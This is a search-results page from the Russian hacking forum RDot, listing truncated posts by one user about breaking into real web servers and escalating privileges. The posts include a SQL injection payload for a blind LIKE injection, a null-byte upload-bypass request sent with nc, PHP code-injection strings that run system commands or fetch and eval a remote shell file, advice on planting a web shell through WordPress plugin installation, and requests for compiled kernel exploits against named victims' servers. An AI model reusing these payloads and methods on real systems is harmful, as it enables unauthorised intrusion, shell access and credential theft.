Вернуться   RDot > Поиск по форуму

Показано с 1 по 25 из 55.
На поиск затрачено 0.00 сек.
Поиск: Сообщения от: QaRTiN
Раздел: Повышение привилегий/Privilege escalation 18.07.2015, 23:51
Ответов: 1,219
Просмотров: 733,493
Автор QaRTiN
================================================ ...

================================================
uname -a
================================================
Linux *** 3.2.0-58-generic #88-Ubuntu SMP Tue Dec 3 17:40:43 UTC 2013 i686 i686 i386...
Раздел: Web-среда/Web-applications 29.05.2015, 23:19
Ответов: 3,618
Просмотров: 2,260,815
Автор QaRTiN
если найдешь папку доступную для записи,замени...

если найдешь папку доступную для записи,замени upload_path в site.com/wp-admin/options.php и лей шелл через установку плагинов
Раздел: Web-среда/Web-applications 18.02.2015, 23:12
Ответов: 3,618
Просмотров: 2,260,815
Автор QaRTiN
ребят,подсобите советом) на сервере есть...

ребят,подсобите советом)

на сервере есть шелл(.php) c привилегиями юзера apache
на том же сервере есть скрипт-аплоадер(.cgi),который выполняется с привилегиями юзера katya
при попытке залить...
Раздел: Web-среда/Web-applications 25.01.2015, 17:56
Ответов: 3,618
Просмотров: 2,260,815
Автор QaRTiN
1)Гружу в папку файл "file[пробел]" c любым...

1)Гружу в папку файл "file[пробел]" c любым php-кодом,затем в консоли:
echo -e "GET /papka/file \0.php HTTP/1.1\r\nHost: www.host.com\r\n\r\n" | nc -w 1 host.com 80

и мне выдает:

HTTP/1.1 403...
Раздел: Web-среда/Web-applications 25.01.2015, 03:39
Ответов: 3,618
Просмотров: 2,260,815
Автор QaRTiN
предлагает скачать(

предлагает скачать(
Раздел: Web-среда/Web-applications 25.01.2015, 02:03
Ответов: 3,618
Просмотров: 2,260,815
Автор QaRTiN
ребят,хэлп такая ситуация: жертва на сервере...

ребят,хэлп

такая ситуация: жертва на сервере c nginx,есть аплоад файлов(любых в любую папку) и читалка файлов

проблема в том,что для единственной папки доступной из-под веба для записи,в...
Раздел: Web-среда/Web-applications 26.12.2014, 03:04
Ответов: 3,618
Просмотров: 2,260,815
Автор QaRTiN
зарегаться возможности нет,ключ вряд ли...

зарегаться возможности нет,ключ вряд ли неправильный...
вот:
ключ = empabhi70004032BUSempabhi
HEX(pass) = F8229B2AFBC3E72F5D65FB4FF50B19C9

пробывал:
select...
Раздел: Web-среда/Web-applications 26.12.2014, 02:45
Ответов: 3,618
Просмотров: 2,260,815
Автор QaRTiN
Ребят,хелп: как расшифровать пасс в AES? В...

Ребят,хелп:
как расшифровать пасс в AES?
В ошибке скрипта спален ключ шифрования,что-то вроде "select ... AES_DECRYPT(pass,'key')"
с помощью скули вывел HEX-значение пароля HEX(pass)
Ответ...
Раздел: Web-среда/Web-applications 02.11.2014, 21:53
Ответов: 3,618
Просмотров: 2,260,815
Автор QaRTiN
ребят,есть ли универсальная sql-иньекция для этих...

ребят,есть ли универсальная sql-иньекция для этих двух sql-запросов?

select id2 from schema.table where id=$id; -- для этой: 1 union all select version()#
select id3 from schema.table where...
Раздел: Web-среда/Web-applications 27.10.2014, 21:55
Ответов: 3,618
Просмотров: 2,260,815
Автор QaRTiN
ребят,есть такой файл: <?php $id =...

ребят,есть такой файл:

<?php
$id = $_GET['id'];
echo @file_get_contents("/tmp/tg_l.$id");
?>

кроме читалки тут ничего нет?)
Раздел: Web-среда/Web-applications 07.10.2014, 20:02
Ответов: 3,618
Просмотров: 2,260,815
Автор QaRTiN
Ребят,можно ли обойти rsfirewall в джумле? ...

Ребят,можно ли обойти rsfirewall в джумле?
Стоит backend-password на админку.Есть скуля,но md5-хэш этого пасса не сбрутился.
Возможно ли в куках передать этот хэш или,может быть,в бд где-то...
Раздел: Повышение привилегий/Privilege escalation 09.05.2014, 12:16
Ответов: 1,219
Просмотров: 733,493
Автор QaRTiN
SynQ, понял,спасибо других возможностей...

SynQ, понял,спасибо

других возможностей поднять права нет? хотя бы до юзера 500-503
Раздел: Повышение привилегий/Privilege escalation 09.05.2014, 09:43
Ответов: 1,219
Просмотров: 733,493
Автор QaRTiN
ребят,help ;) gcc нет или нет прав на него ...

ребят,help ;)
gcc нет или нет прав на него
уязвим ли серв к CVE-2013-2094 (https://rdot.org/forum/showthread.php?t=2720)?


$ grep -i PERF_EVENTS /boot/config-$( uname -r ) 2>&1...
Раздел: Оффтоп/Offtopic 08.05.2014, 18:02
Ответов: 800
Просмотров: 357,998
Автор QaRTiN
ещё и 1st Access Level интригующе)

ещё и 1st Access Level

интригующе)
Раздел: Web-среда/Web-applications 13.04.2014, 04:51
Ответов: 3,618
Просмотров: 2,260,815
Автор QaRTiN
Ребят,подсобите с блайнд скулей,плз Скуля в...

Ребят,подсобите с блайнд скулей,плз

Скуля в LIKE.
Все БД выводятся так:
%' AND ORD(MID((SELECT DISTINCT(schema_name) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 0,1),1,1))>104 AND '%'='
В списке БД...
Раздел: Web-среда/Web-applications 06.03.2014, 19:33
Ответов: 3,618
Просмотров: 2,260,815
Автор QaRTiN
site.com/?lol=${@system('uname -a')} ...

site.com/?lol=${@system('uname -a')}
site.com/?lol=${@eval(file_get_contents('http://site.com/shell.txt'))} (в shell.txt убери в начале <?php и в конце ?>)
site.com/?lol=${@print(`ls -la`)} ...
Раздел: Повышение привилегий/Privilege escalation 15.12.2013, 09:34
Ответов: 1,219
Просмотров: 733,493
Автор QaRTiN
ребят,можно тут подняться? ...

ребят,можно тут подняться?


================================================
uname -a
================================================
Linux *** 2.6.32-358.14.1.el6.x86_64 #1 SMP Tue Jul 16...
Раздел: Повышение привилегий/Privilege escalation 11.12.2013, 05:14
Ответов: 1,219
Просмотров: 733,493
Автор QaRTiN
ошибки те же(

ошибки те же(
Раздел: Повышение привилегий/Privilege escalation 10.12.2013, 20:55
Ответов: 1,219
Просмотров: 733,493
Автор QaRTiN
вываливает кучу ошибок Script started on Tue...

вываливает кучу ошибок

Script started on Tue Dec 10 11:52:37 2013
In file included from 1.c:20:
/usr/include/stdio.h:34:21: error: stddef.h: No such file or directory
In file included from...
Раздел: Повышение привилегий/Privilege escalation 10.12.2013, 19:45
Ответов: 1,219
Просмотров: 733,493
Автор QaRTiN
пробовал заюзать enlightenment из /tmp,но тот...

пробовал заюзать enlightenment из /tmp,но тот компилился с ошибками
есть шансы?



================================================
uname -a
================================================...
Раздел: Web-среда/Web-applications 02.12.2013, 17:11
Ответов: 3,618
Просмотров: 2,260,815
Автор QaRTiN
На somedomain.site.com обычная wordpress-админка...

На somedomain.site.com обычная wordpress-админка без Basic Authorization.Права на папку сайта(somedomain.site.com) - полные.
Сайт site.com находится на другом сервере.CSRF врятли...
Раздел: Web-среда/Web-applications 02.12.2013, 16:31
Ответов: 3,618
Просмотров: 2,260,815
Автор QaRTiN
Вектор атаки

Ребят,есть вебшелл на somedomain.site.com(вп-блог).Права апача,рута не получить,бэк режется фаером.
Находится на отдельном сервере,к site.com не подобраться.
Есть админ-акк от site.com,но на...
Раздел: Повышение привилегий/Privilege escalation 19.11.2013, 18:02
Ответов: 1,219
Просмотров: 733,493
Автор QaRTiN
пробывал на разных машинах - не компилится со...

пробывал на разных машинах - не компилится со -static

Pashkela,если не трудно,можешь скинуть скомпиленный сплоит,плз?
Раздел: Повышение привилегий/Privilege escalation 16.11.2013, 05:42
Ответов: 1,219
Просмотров: 733,493
Автор QaRTiN
там gcc нет( есть ли другой способ заюзать этот...

там gcc нет(
есть ли другой способ заюзать этот сплоит?
или мб кто-то сможет скомпилить этот сплоит на похожей машине?
Раздел: Повышение привилегий/Privilege escalation 13.11.2013, 04:03
Ответов: 1,219
Просмотров: 733,493
Автор QaRTiN
Help me,guys,please ;) ...

Help me,guys,please ;)



================================================
uname -a
================================================
Linux *** 2.6.32-358.el6.x86_64 #1 SMP Fri Feb 22 00:31:26...
Показано с 1 по 25 из 55.

 
Быстрый переход


Powered by vBulletin® Version 3.8.5
Copyright ©2000 - 2019, Jelsoft Enterprises Ltd. Перевод: zCarot